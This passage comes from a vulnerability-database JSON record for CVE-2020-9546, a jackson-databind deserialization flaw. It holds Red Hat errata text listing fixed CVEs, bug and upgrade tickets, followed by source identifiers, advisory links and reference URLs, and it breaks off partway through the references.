this release. \n\nSecurity Fix(es):\n\n* cxf: reflected XSS in the services listing page (CVE-2019-17573)\n\n* cxf-core: cxf: OpenId Connect token service does not properly validate\nthe clientId (CVE-2019-12423)\n\n* jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* undertow: servletPath in normalized incorrectly leading to dangerous\napplication mapping which could result in security bypass (CVE-2020-1757)\n\n* jackson-databind: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* resteasy-jaxrs: resteasy: Improper validation of response header in\nMediaTypeHeaderDelegate.java class (CVE-2020-1695)\n\n* cryptacular: excessive memory allocation during a decode operation\n(CVE-2020-7226)\n\n* smallrye-config: SmallRye: SecuritySupport class is incorrectly public\nand contains a static method to access the current threads context class\nloader (CVE-2020-1729)\n\n* resteasy: RESTEASY003870 exception in RESTEasy can lead to a reflected\nXSS attack (CVE-2020-10688)\n\n* jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n(CVE-2020-8840)\n\n* undertow: invalid HTTP request with large chunk size (CVE-2020-10719)\n\n* jackson-databind: Serialization gadgets in shaded-hikari-config\n(CVE-2020-9546)\n\n* jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)\n\n* jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)\n\n* undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)\n\n* libthrift: thrift: Endless loop when feed with specific input data\n(CVE-2019-0205)\n\n* libthrift: thrift: Out-of-bounds read related to TJSONProtocol or\nTSimpleJSONProtocol (CVE-2019-0210)\n\n* wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not\nrespected if OpenSSL security provider is in use (CVE-2019-14887)\n\n* jsf-impl: Mojarra: Path traversal via either the loc parameter or the con\nparameter, incomplete fix of CVE-2018-14371 (CVE-2020-6950)\n\n* jsf-impl: mojarra: Path traversal in\nResourceManager.java:getLocalePrefix() via the loc parameter\n(CVE-2018-14371)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, see the CVE page(s) listed in the\nReferences section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1607709 - CVE-2018-14371 mojarra: Path traversal in ResourceManager.java:getLocalePrefix() via the loc parameter\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1764607 - CVE-2019-0210 thrift: Out-of-bounds read related to TJSONProtocol or TSimpleJSONProtocol\n1764612 - CVE-2019-0205 thrift: Endless loop when feed with specific input data\n1772008 - CVE-2019-14887 wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not respected if OpenSSL security provider is in use\n1797006 - CVE-2019-12423 cxf: OpenId Connect token service does not properly validate the clientId\n1797011 - CVE-2019-17573 cxf: reflected XSS in the services listing page\n1801380 - CVE-2020-7226 cryptacular: excessive memory allocation during a decode operation\n1802444 - CVE-2020-1729 SmallRye: SecuritySupport class is incorrectly public and contains a static method to access the current threads context class loader\n1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-16114 - (7.3.z) Upgrade jboss-vfs to 3.2.15.Final\nJBEAP-18060 - [GSS](7.3.z) Upgrade weld from 3.1.2.Final-redhat-00001 to 3.1.4.Final-redhat-00001\nJBEAP-18163 - (7.3.z) Upgrade HAL from 3.2.3.Final-redhat-00001 to 3.2.8.Final-redhat-00001\nJBEAP-18221 - (7.3.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00010 to 2.5.5.SP12-redhat-00012\nJBEAP-18240 - (7.3.z) Update the Chinese translations in WildFly Core\nJBEAP-18241 - (7.3.z) Update the Japanese translations in WildFly Core\nJBEAP-18273 - (7.3.z) Upgrade IronJacamar from 1.4.19.Final to 1.4.20.Final\nJBEAP-18277 - [GSS](7.3.z) Upgrade JBoss JSF API from 3.0.0.SP01-redhat-00001 to 3.0.0.SP02-redhat-00001\nJBEAP-18288 - [GSS](7.3.z) Upgrade FasterXML from 2.10.0 to 2.10.3\nJBEAP-18294 - (7.3.z) Upgrade JAXB from 2.3.1 to 2.3.3-b02 and com.sun.istack from 3.0.7 to 3.0.10\nJBEAP-18302 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.18 to 1.0.20\nJBEAP-18315 - [GSS](7.3.z) Upgrade Artemis from 2.9.0.redhat-00005 to 2.9.0.redhat-00010\nJBEAP-18346 - [GSS](7.3.z) Upgrade jakarta.el from 3.0.2.redhat-00001 to 3.0.3.redhat-00002\nJBEAP-18352 - [GSS](7.3.z) Upgrade JBoss Remoting from 5.0.16.Final-redhat-00001 to 5.0.18.Final-redhat-00001\nJBEAP-18361 - [GSS](7.3.z) Upgrade Woodstox from 5.0.3 to 6.0.3\nJBEAP-18367 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.15 to 5.3.16\nJBEAP-18393 - [GSS](7.3.z) Update $JBOSS_HOME/docs/schema to show https schema URL instead of http\nJBEAP-18398 - Tracker bug for the EAP 7.3.1 release for RHEL-7\nJBEAP-18409 - [GSS](7.3.z) Upgrade Infinispan from 9.4.16.Final-redhat-00002 to 9.4.18.Final-redhat-00001\nJBEAP-18527 - (7.3.z) Upgrade WildFly Naming Client from 1.0.10.Final to 1.0.12.Final\nJBEAP-18528 - (7.3.z) Upgrade jboss-ejb-client from 4.0.27.Final to 4.0.31.Final-redhat-00001\nJBEAP-18596 - [GSS](7.3.z) Upgrade JBoss Modules from 1.9.1 to 1.10.0\nJBEAP-18598 - [GSS](7.3.z) Upgrade Bouncycastle from 1.60.0-redhat-00001 to 1.60.0-redhat-00002\nJBEAP-18640 - [Runtimes] (7.3.x) Upgrade slf4j-jboss-logmanager from 1.0.3.GA.redhat-2 to 1.0.4.GA.redhat-00001\nJBEAP-18653 - (7.3.z) Upgrade Apache CXF from 3.3.4.redhat-00001 to 3.3.5.redhat-00001\nJBEAP-18706 - (7.3.z) Upgrade elytron-web from 1.6.0.Final to 1.6.1.Final\nJBEAP-18770 - Upgrade Jandex to 2.1.2.Final-redhat-00001\nJBEAP-18775 - (7.3.z) Upgrade WildFly Core to 10.1.4.Final-redhat-00001\nJBEAP-18788 - (7.3.x) Upgrade wss4j from 2.2.4.redhat-00001 to 2.2.5.redhat-00001\nJBEAP-18790 - (7.3.z) Upgrade cryptacular from 1.2.0.redhat-1 to 1.2.4.redhat-00001\nJBEAP-18818 - (7.3.z) Upgrade PicketBox from 5.0.3.Final-redhat-00005 to 5.0.3.Final-redhat-00006\nJBEAP-18836 - [GSS](7.3.z) Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-18850 - (7.3.z) Upgrade smallrye-config from 1.4.1 to 1.6.2\nJBEAP-18870 - Upgrade WildFly Common to 1.5.2.Final.redhat-00002\nJBEAP-18875 - Upgrade MicroProfile Metrics API to 2.3 and smallrye-metrics to 2.4.0\nJBEAP-18876 - Upgrade Smallrye Health to 2.2.0 and MP Health API to 2.2\nJBEAP-18877 - (7.3.z) Upgrade Jaeger client to 0.34.3\nJBEAP-18878 - Upgrade Smallrye Opentracing to 1.3.4 and MP Opentracing to 1.3.3\nJBEAP-18879 - (7.3.z) Upgrade MicroProfile Config 1.4\nJBEAP-18929 - (7.3.z) Upgrade WildFly Elytron from 1.10.5.Final-redhat-00001 to 1.10.6.Final\nJBEAP-18990 - (7.3.z) Upgrade jasypt from 1.9.2 to 1.9.3-redhat-00001\nJBEAP-18991 - (7.3.z) Upgrade opensaml from 3.3.0.redhat-1 to 3.3.1-redhat-00002\nJBEAP-19035 - In Building Custom Layers, update pom.xml content for 7.3.1\nJBEAP-19054 - Upgrade MP REST Client to 1.4.0.redhat-00004\nJBEAP-19066 - Upgrade snakeyaml from 1.18.0.redhat-2 to 1.24.0.redhat-00001\nJBEAP-19117 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.2.Final-redhat-00001 to 2.0.4.Final-redhat-00001\nJBEAP-19133 - [GSS](7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP08-redhat-00001 to 2.3.9.SP09-redhat-00001\nJBEAP-19156 - (7.3.z) Upgrade RESTEasy from 3.11.1.Final.redhat-00001 to 3.11.2.Final.redhat-00001\nJBEAP-19181 - (7.3.z) Upgrade WildFly Core to 10.1.5.Final-redhat-00001\nJBEAP-19192 - (7.3.z) Update the Japanese translations\nJBEAP-19232 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.7.Final-redhat-00001\nJBEAP-19281 - (7.3.z) Upgrade undertow from 2.0.30.SP2-redhat-00001 to 2.0.30.SP3-redhat-00001\nJBEAP-19456 - Upgrade wildfly-transaction-client to 1.1.11.Final\n\n7. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nSecurity Fix(es):\n\n* netty (CVE-2016-4970 CVE-2020-7238 CVE-2019-20444 CVE-2019-20445)\n\n* dom4j (CVE-2018-1000632)\n\n* elasticsearch (CVE-2018-3831)\n\n* pdfbox (CVE-2018-11797)\n\n* vertx (CVE-2018-12541)\n\n* spring-data-jpa (CVE-2019-3797)\n\n* mina-core (CVE-2019-0231)\n\n* jackson-databind (CVE-2019-12086 CVE-2019-16335 CVE-2019-14540\nCVE-2019-17267 CVE-2019-14892 CVE-2019-14893 CVE-2019-16942 CVE-2019-16943\nCVE-2019-17531 CVE-2019-20330 CVE-2020-10673 CVE-2020-10672 CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11620 CVE-2020-11619\nCVE-2020-14195 CVE-2020-14060 CVE-2020-14061 CVE-2020-14062)\n\n* jackson-mapper-asl (CVE-2019-10172)\n\n* hawtio (CVE-2019-9827)\n\n* undertow (CVE-2019-9511 CVE-2020-1757 CVE-2019-14888 CVE-2020-1745)\n\n* santuario (CVE-2019-12400)\n\n* apache-commons-beanutils (CVE-2019-10086)\n\n* cxf (CVE-2019-17573)\n\n* apache-commons-configuration (CVE-2020-1953)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThe JBoss server process must be restarted for the update to take effect",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9546"
},
{
"db": "VULHUB",
"id": "VHN-187671"
},
{
"db": "VULMON",
"id": "CVE-2020-9546"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158038"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-9546",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "159083",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159724",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158048",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158282",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.3558",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2287",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1440",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.0828",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2050",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2042",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3703",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48008",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "159080",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159082",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159081",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2020-16493",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-187671",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-9546",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158038",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187671"
},
{
"db": "VULMON",
"id": "CVE-2020-9546"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
},
{
"db": "NVD",
"id": "CVE-2020-9546"
}
]
},
"id": "VAR-202003-1784",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-187671"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:04:27.314000Z",
"patch": {
"_id": null,
"data": [
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=111243"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203638 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202515 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203637 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 on RHEL 8 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203639 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.2.9 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203642 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202513 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202512 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.3.1 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202511 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM InfoSphere Information Server is affected by multiple vulnerabilities in Jackson databind",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=88553214b693594d88e3b37f8bb2c078"
},
{
"title": "Red Hat: Important: Satellite 6.8 release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204366 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Analyzer viewpoint",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-109"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities in Data-Binding for Jackson shipped with IBM Operations Analytics \u2013 Log Analysis",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1db4c8cb14383c63d0c04205c943ef8a"
},
{
"title": "IBM: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2ec7385c474071281be069b54d841de6"
},
{
"title": "Cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "PHunter",
"trust": 0.1,
"url": "https://github.com/CGCL-codes/PHunter "
},
{
"title": "PHunter",
"trust": 0.1,
"url": "https://github.com/Anonymous-Phunter/PHunter "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/PalindromeLabs/Java-Deserialization-CVEs "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/lnick2023/nicenice "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/qazbnm456/awesome-cve-poc "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-9546"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187671"
},
{
"db": "NVD",
"id": "CVE-2020-9546"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200904-0006/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2631"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3cdev.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097%40%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18%40%3cnotifications.zookeeper.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3cnotifications.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3cdev.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3cissues.zookeeper.apache.org%3e"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-information-server-is-affected-by-multiple-vulnerabilities-in-jackson-databind/"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48008"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-fasterxml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-9548-cve-2020-9546-cve-2020-9547-cve-2020-8840-cve-2019-20330/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3703/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-business-intelligence-has-addressed-multiple-vulnerabilities-q12021/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2287/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-ibm-cloud-pak-for-data-affected-by-vulnerability-in-fasterxml-jackson-databind-6/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-jackson-databind-publicly-disclosed-vulnerability-found-in-network-performance-insight/"
},
{
"trust": 0.6,
